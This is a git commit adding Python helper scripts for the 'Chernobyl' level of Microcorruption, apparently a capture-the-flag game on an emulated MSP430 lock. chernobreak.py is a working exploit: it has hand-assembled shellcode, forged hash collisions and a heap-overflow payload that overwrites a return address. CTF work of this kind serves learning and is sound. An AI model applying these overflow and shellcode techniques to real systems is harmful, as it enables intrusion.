Renumber levels to match official indices

2025-10-30 00:49:14 +00:00 · 2022-12-12 01:01:29 -06:00
parent 7925e24844
commit a9051bf671
34 changed files with 0 additions and 0 deletions
--- a/18-Chernobyl/Code/crappy_python/caller_id.py
+++ b/18-Chernobyl/Code/crappy_python/caller_id.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python3
+"""
+caller_id: Call a function with arbitrary parameters in microcorruption
+"""
+
+import re
+
+preamble = "reset; break main; continue; unbreak main;"
+
+while 1:
+   address, *args = re.split(r"[(,) ]",input("> "))
+   if address == "": break
+   print(f"{preamble} Let pc = {address}", end=";")
+   reg = 15
+   for arg in args:
+      if arg:
+         print(f"Let r{reg} = {arg}", end=";")
+         reg -= 1
+   print("\b ")
--- a/18-Chernobyl/Code/crappy_python/chernobreak.py
+++ b/18-Chernobyl/Code/crappy_python/chernobreak.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python3
+
+# user info
+user_struct_size = 0x12 # User is a tuple of (char[16], i16)
+
+users_per_box = 0x5
+
+# Stack info
+ret_stack_addr  = 0x3dce - 0x0004 # 3nd index of header struct
+ret_addr        = 0x49a2          # Address that will be returned to
+stackbuffer_top = 0x3df0 - 0x0006 # top of stack buffer, PLUS "new "
+target_offset   = ((stackbuffer_top - ret_addr) & 0xffff) + 1
+
+print(f"{ret_stack_addr = :x}, {ret_addr = :x}, {target_offset = :x}");
+
+bnew = b'new '
+
+clobber = ret_stack_addr.to_bytes(2, 'little').hex() + 'fc50' + target_offset.to_bytes(2, 'little').hex()
+
+'''
+sub.b #1, r8   5883
+swpb r8        8810
+mov r8, sr     0248
+mov #4cfc, pc  3040 fc4c
+'''
+payload = "5883 8810 0248 3040fc4c"
+
+# Hash function, which governs the boxes
+def hash(byts: bytes):
+   ret = 0;
+   for c in byts:
+      ret += c
+      ret = ((ret << 5) - ret) & 0xffff
+   return ret
+
+# Fix a string by adding a character that causes a hash collision
+def fixhash(name:bytes, box:int, modulus:int):
+   error = box - (hash(name) % modulus)
+   if error % modulus == 0:
+      return name
+   name += (ord("@")+error+modulus).to_bytes(1, "big")
+   print(f"{name.hex() = }; {error = }; new box = {hash(name) % modulus}")
+   return name
+
+def a2h (s: str):
+   return bytes(s, 'ascii').hex()
+payload = f'{a2h("new ")} {fixhash(bytes.fromhex(payload), 0, 16).hex()} {a2h(" ;new 8 ;new @ ;new H ;new P ;")} {bnew.hex()} {fixhash(bytes.fromhex(clobber), 0, 16).hex()} {a2h(" ;new 1 ;new 9 ;new A ;new I ;new Q ;new")}'
+print(payload)
+
+exit(0)
+while 1:
+   name, box = input("> ").split()
+   print(fixhash(bytes(name, "ascii"), int(box), 16).decode('ascii'));
--- a/18-Chernobyl/Code/crappy_python/hashfunc.py
+++ b/18-Chernobyl/Code/crappy_python/hashfunc.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+
+# TODO: Actually break the hashes?
+# TODONE in chernobreak.py
+
+def hash(chars):
+   ret = 0;
+   for c in chars:
+      ret += c
+      ret = ((ret << 5) - ret) & 0xffff
+   return ret
+
+while True:
+   try:
+      line = input("> ")
+      if (len(line) and line[0] == '~'):
+         h = hash(bytes.fromhex(line[1:]));
+      else:
+         h = hash(line.encode())
+      print(f"hash: {h:x}, box[3]: {h&7:x}, box[4]: {h&0xf:x}");
+   except EOFError:
+      break
+
+print("")